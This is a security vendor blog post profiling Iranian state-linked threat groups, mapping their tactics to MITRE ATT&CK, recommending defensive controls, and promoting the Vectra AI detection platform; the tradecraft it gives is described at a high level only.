Blogs
>
Cyberattack

Are Iranian APTs Already inside Your Hybrid Network?

July 10, 2025

Are Iranian APTs Already inside Your Hybrid Network?

The recent Iran–Israel escalation has sparked a spike in cyber operations from state-linked actors zeroing in on identity, cloud, and enterprise networks. These well-resourced groups combine deep network intrusions with identity abuse to slip past traditional defenses.

They exploit public-facing apps for initial access, harvest credentials via phishing or password spraying, then move laterally with RDP, PsExec, or remote-access services. Persistence comes through scheduled tasks, DLL sideloading, hidden windows, and protocol tunneling. Data is quietly staged, archived, and exfiltrated over obscure channels often without triggering legacy alerts.

Simultaneously, they launch identity-focused campaigns inside Microsoft 365, Azure, and Google Workspace: abusing OAuth, bypassing MFA, and weaponizing Outlook, OneDrive, and Teams to maintain access and siphon data. These tactics target critical infrastructure, government, commercial enterprises, and NGOs across the Middle East and the West—blending espionage and destructive attacks (wipers, forced encryption).

Relying only on endpoints or perimeter controls leaves you blind to the full attack chain. If you use cloud collaboration, hybrid infrastructure, or remote access, you’re already in their sights.

Recent Activity from Iranian Threat Actors

Iranian threat groups continue to run sustained cyber operations against organizations across government, telecommunications, energy, and technology sectors. Recent campaigns show actors like MuddyWater expanding their use of identity abuse and cloud-native tooling while maintaining traditional PowerShell-based intrusion techniques. Rather than deploying obvious malware, these operators increasingly rely on scripts, legitimate administration tools, and compromised infrastructure to maintain stealth across hybrid environments.

Who’s Behind the Attacks: Iran-Linked APT Profiles

Despite varying goals (ranging from long-term espionage to outright sabotage) each group leverages both network and identity channels to breach, persist, and extract. Below is a high-level view of their initial access, network TTPs, and identity/cloud TTPs.

Iranian threat groups frequently reuse tooling across campaigns, particularly PowerShell frameworks, script loaders, and open-source remote access tools. This reuse makes behavioral detection across identity and network telemetry especially effective.

Group	Initial Access	Network Tactics	Identity/Cloud Tactics
APT33 (alias Peach Sandstorm, HOLMIUM, COBALT TRINITY, Elfin, Refined Kitten)	Spear-phishing emails with job postings, social engineering campaigns, and exploiting known vulnerabilities.	Executing malicious code via PowerShell and scheduled tasks. Moving laterally using RDP, WMI, and stolen credentials. Dumping credentials for escalation and persistence. Archiving and exfiltrating sensitive data over encrypted or obscure channels. Maintaining stealth using obfuscation, registry keys, and encoded traffic.	Spear-phishing using job postings and social engineering to obtain credentials. Password-spraying to access Office 365 and Azure accounts. Once credentials are obtained, accessing accounts through commercial VPNs. Using Azure-specific tools to enumerate Entra ID (Azure AD) and harvest user and group data. Deploying malicious ZIPs via Microsoft Teams messages to extract Active Directory information.
APT34 (alias Helix Kitten, OilRig, CHRYSENE, COBALT GYPSY)	Spear-phishing emails and fake job postings targeting individuals in specific roles.	Using remote desktop protocols and VPN tunneling for movement. Dumping credentials and escalating privileges via known exploits. Exfiltrating data through DNS tunneling, FTP, and compromised email. Evading detection with masquerading, signed binaries, and firewall manipulation.	Spear-phishing emails and fake job postings to gain access to Exchange and other cloud accounts. Leveraging cloud email features like Exchange to stealthily exfiltrate data. Exploiting data transfer size limits to avoid detection. Harvesting credentials and reusing them for lateral movement across SaaS environments.
APT35 (alias Charming Kitten, Magic Hound, Mint Sandstorm, COBALT ILLUSION, TA453, PHOSPHORUS)	Spear-phishing emails, fake login portals mimicking cloud services, and compromised accounts.	Performing lateral movement via RDP and scheduled tasks. Dumping credentials from browsers and memory for deeper access. Transferring data using encrypted channels and cloud sharing platforms. Evading security by disabling logging and blending C2 traffic with web activity.	Targeting credentials through fake login portals mimicking cloud/SaaS services. Bypassing MFA protections using social engineering and convincing fake sign-in pages. Taking advantage of vulnerabilities in cloud-hosted Exchange or other SaaS apps for privileged access. Using cloud accounts to harvest files and emails of interest silently.
APT42 (alias Crooked Charms)	Prolonged social engineering and impersonation of trusted contacts to gain credentials.	Using encrypted HTTPS channels for stealthy data transfer. Tunneling access through spoofed VPN and masqueraded remote sessions. Executing scripts for discovery, keylogging, and data collection. Blending in with legitimate traffic to avoid raising alerts.	Extensive social engineering to gain persistent access to Microsoft 365 and similar platforms. Exploiting legitimate client apps to appear as normal user activity. Downloading OneDrive files and Outlook emails using the compromised account without raising suspicion. Deploying simple scripts to extract sensitive data.
MuddyWater (alias STATIC KITTEN, Earth Vetala, MERCURY, Seedworm, Mango Sandstorm, TEMP.Zagros)	Spear-phishing and vulnerability exploitation.	Executing PowerShell-based loaders and scripting frameworks that deploy additional payloads from memory. Using compromised web servers and legitimate hosting infrastructure for command-and-control traffic. Moving laterally using remote administration tools, PowerShell remoting, and WMI. Staging data for exfiltration through HTTP-based C2 channels while blending into normal network activity.	Targeting Microsoft 365 credentials through phishing and social engineering campaigns. Abusing legitimate cloud services such as Outlook, OneDrive, and SharePoint to collect and move sensitive data. Using compromised accounts to send internal phishing messages and expand access within the tenant. Leveraging legitimate authentication sessions to maintain persistence without deploying obvious malware.
Rampant Kitten	Malicious Android apps and phishing to steal credentials and gain device control.	Delivering payloads through remote-template Word docs hosted on spoofed SharePoint domains. Maintaining C2 via SOAP over HTTPS with fallback OneDrive-style endpoints. Exfiltrating Telegram tokens, KeePass vaults, and sensitive files using base64-encoded uploads. Persisting by replacing Telegram's updater and injecting payloads into explorer.exe. Expanding collection through Android backdoors and Telegram-phishing sites.	Phishing for Google credentials by mimicking legitimate login pages on Android devices. Using captured credentials to log into Gmail and other Google cloud services. Extracting data via browser sessions and built-in cloud app features while avoiding obvious malware indicators.
Agrius (alias DarkRypt, Pink Sandstorm, AMERICIUM, Agrius, Black Shadow, Spectral Kitten)	Deployment of webshells after phishing or exploiting vulnerable servers.	Gaining access by exploiting public-facing apps and misconfigurations. Performing internal recon and lateral movement via remote desktop tunneling. Dumping credentials for privilege escalation and persistence. Staging and exfiltrating data using common transfer methods. Impairing security tools and disguising activity to evade detection.	Deploying scripts to extract credentials from internal accounts after phishing or social engineering access. Pivoting laterally using valid credentials and authorized sessions in cloud apps.

Five Identity and Cloud Techniques SOC Teams Must Monitor

Iran-affiliated threat actors are moving beyond traditional malware and exploits. Their campaigns now hinge on abusing identity systems and living within the trusted tools your organization already uses. These five techniques are central to how they evade detection and maintain persistence in cloud environments. Each represents a critical visibility gap if your team is relying on traditional EDR or SIEM tools alone.

Credential Theft via Spear Phishing
Fake login portals mimicking Office 365 or Gmail, password spraying, and MFA-bypass techniques.
Cloud Account Hijacks
Using stolen credentials to access email, OneDrive, SharePoint, or Azure apps.
Recon and Lateral Movement
Enumerating Entra ID (Azure AD), creating rogue OAuth apps or subscriptions for persistence.
Data Exfiltration via Legitimate Tools
Moving data through OneDrive, Outlook, or web-based APIs to hide within normal traffic.
Living-Off-the-Land Scripts and Cloud Tools
Iranian threat actors increasingly rely on PowerShell loaders, administrative scripts, and legitimate cloud APIs instead of custom malware.

TA0001Initial Access	TA0002Execution	TA0003Persistence	TA0004Privilege Escalation	TA0005Defense Evasion	TA0006Credential Access	TA0007Discovery	TA0008Lateral Movement	TA0009Collection	TA0011Command & Control	TA0010Exfiltration	TA0040Impact
T1566.001Spearphishing Attachment	T1047Windows Management Instrumentation	T1098.005Device Registration	T1068Exploitation for Privilege Escalation	T1564.004Hidden Window	T1110.001Password Spraying	T1012Query Registry	T1021.001RDP	T1560Archive Collected Data	T1071.001Web Protocols	T1048Alt Protocol Exfiltration	T1485Data Destruction
T1566.002Spearphishing Link	T1053.005Scheduled Task/Job	T1547Boot or Logon Autostart	T1055Process Injection	T1036.005Masquerading	T1555Credentials from Password Stores	T1082System Information Discovery	T1021.002SMB Admin Shares		T1102.001Dead Drop Resolver		T1486Data Encrypted for Impact
T1133External Remote Services	T1059.001PowerShell			T1562.001Disable or Modify Tools	T1555.003Credentials from Web Browsers	T1069.002Domain Group Discovery
T1190Exploit Public-Facing Application				T1572Protocol Tunnelling	T1003OS Credential Dumping	T1069.003Cloud Group Discovery
					T1556.006MFA Request Generation	T1482Domain Trust Discovery
					T1558.003Kerberoasting

MITRE Techniques used by Iranian APTs

Why Iranian APTs Are Targeting Cloud and Identity

For Iranian threat groups, cloud platforms and identity systems offer scale, stealth, and strategic access. These attackers are adapting their operations to match how organizations actually work today. Remote access, federated identity, and cloud-first infrastructure have created a wide attack surface where traditional controls often lack visibility.

Key reasons these environments are attractive targets include:

Identity is the new perimeter. Once attackers obtain valid credentials tied to SaaS platforms or cloud admin roles, they often bypass traditional defenses entirely. Security tools focused on endpoints or firewalls rarely flag authenticated API calls or abnormal login behavior when the session appears legitimate.
Cloud environments provide operational cover. Iranian APT groups frequently operate within sanctioned applications such as Microsoft 365, Azure, and Google Workspace. They exploit weak OAuth policies, misconfigured conditional access rules, and excessive privileges to maintain persistence while blending into normal user activity.
Hybrid networks create pivot opportunities. Many organizations maintain links between on-prem systems and cloud environments. Iranian actors have abused identity synchronization services and hybrid management tools to pivot from compromised internal systems into cloud tenants, allowing them to expand access across environments.
Living-off-the-land scripting reduces malware visibility. Recent campaigns from groups such as MuddyWater show heavy reliance on PowerShell loaders and script-based frameworks that execute payloads directly in memory. Instead of deploying obvious malware, attackers retrieve tools dynamically and operate using native system capabilities.
Cloud-native tooling is dual-use.Tools like Microsoft Graph API, PowerShell, Outlook, Teams messaging, and remote administration software are designed to enable productivity. Iranian actors routinely use these same capabilities to enumerate environments, move laterally, and exfiltrate data while remaining difficult to distinguish from legitimate activity.

In short, cloud and identity attacks allow Iranian APT groups to operate quietly across hybrid environments. They blend into legitimate user behavior, avoid traditional defenses, and exploit visibility gaps that many organizations still struggle to monitor effectively.

Security Controls to Disrupt Iranian APT Tradecraft

To reduce your exposure to the techniques detailed above and make your environment a harder target, we recommend the following immediate actions:

Enforce Multi-Factor Authentication to stop phishing and MFA bypass.
Enable Conditional Access and device policies on cloud/SaaS accounts.
Monitor login activity for suspicious IPs, unusual geographies, and VPN-originated logins.
Lock down OAuth apps and permissions: review all app consents and service accounts in Microsoft 365/Azure.
Audit privileged accounts regularly especially those with admin roles within Exchange/Azure.
Implement User Training: recognize fake login portals and social engineering tactics.
Monitor for data exfiltration: set up DLP rules and Cloud Access Security Broker (CASB) policies.
Check MFA push behaviour: restrict notifications after repeated failed attempts or use phishing-resistant MFA options like FIDO2.

These controls harden your environment but detecting credential misuse and network stealth requires active, behavior-driven visibility.

Turn Iranian APT Intelligence Into Immediate Threat Hunting

Understanding how Iranian threat groups operate is only the first step. The next challenge is determining whether those same techniques are already happening inside your environment.

SOC teams don’t need another report explaining attacker tradecraft. What they need are concrete ways to test their environment for those behaviors.

To help security teams move from intelligence to investigation, we created a set of threat hunts tied directly to Iranian APT tradecraft observed in recent campaigns. These hunts surface early indicators across identity and network activity, including:

Suspicious Microsoft 365 device registrations linked to credential compromise
OilRig command-and-control infrastructure communication
SpyNote and QasarRAT DNS activity tied to attacker infrastructure
Failed device registrations that may indicate APT35 reconnaissance
Network sessions associated with Pupy malware infrastructure

Each hunt includes a ready-to-run query you can execute inside the Vectra AI Platform to quickly identify potential attacker activity.

*Hunting for iranian APT related activities in the Vectra AI Platform*

Running targeted hunts like these helps analysts move from passive monitoring to proactive detection. Instead of waiting for alerts, your team can directly search for the behaviors Iranian operators rely on once they gain access.

Because these actors blend identity abuse, SaaS activity, and network infrastructure, effective detection requires visibility across all three.

That’s exactly where the Vectra AI Platform provides an advantage.

How the Vectra AI Platform Exposes Iranian APT Activity

Traditional security tools tend to focus on isolated signals: endpoint alerts, firewall logs, or authentication events. Iranian threat actors operate across identity systems, SaaS platforms, and network infrastructure simultaneously, which makes those siloed approaches easy to evade.

The Vectra AI Platform continuously analyzes behavior across: Network traffic Active Directory and Entra ID Microsoft 365 identity activity Cloud platforms including AWS and Azure Instead of relying on static indicators, the platform identifies abnormal behavior that signals compromise even when attackers use legitimate credentials or sanctioned cloud tools.

This gives SOC teams the visibility needed to detect the exact techniques used by Iranian APT groups: credential abuse, identity manipulation, stealthy lateral movement, and covert command-and-control activity.

According to IDC, organizations using Vectra AI identify 52% more threats in at least 50% less time.

Here’s how Vectra AI detects each of the five core techniques used by Iranian APTs:

Technique	Vectra AI Coverage
Credential Theft	Detects password spraying and suspicious sign-in behaviors, including anomalous geography, user agents, and VPN-originated logins
Cloud Account Hijack	Flags unauthorized access to mailboxes, OneDrive, and other services, especially when behavior deviates from the user’s normal baseline
Recon & Lateral Movement	Identifies enumeration of Entra ID objects, rogue OAuth consent flows, and suspicious Azure subscription activity
Data Exfiltration via Legitimate Tools	Detects abnormal data movement through sanctioned SaaS apps, such as large downloads or bulk file transfers over API
Living-Off-the-Land	Surfaces abuse of native tools like Outlook, PowerShell, and remote access software that blend into routine workflows

The Vectra AI Platform does not require agents. It integrates natively with Microsoft and applies real-time detection logic tailored to identity-driven attacks. This approach delivers precise, high-fidelity alerts and automated response capabilities that empower SOC teams to act decisively without drowning in false positives.

Already a Vectra AI NDR customer?

To defend against this new wave of identity and cloud-centric attacks, we strongly recommend expanding your existing deployment with Identity and Cloud coverage. This ensures unified visibility and protection across hybrid environments where these threat actors thrive.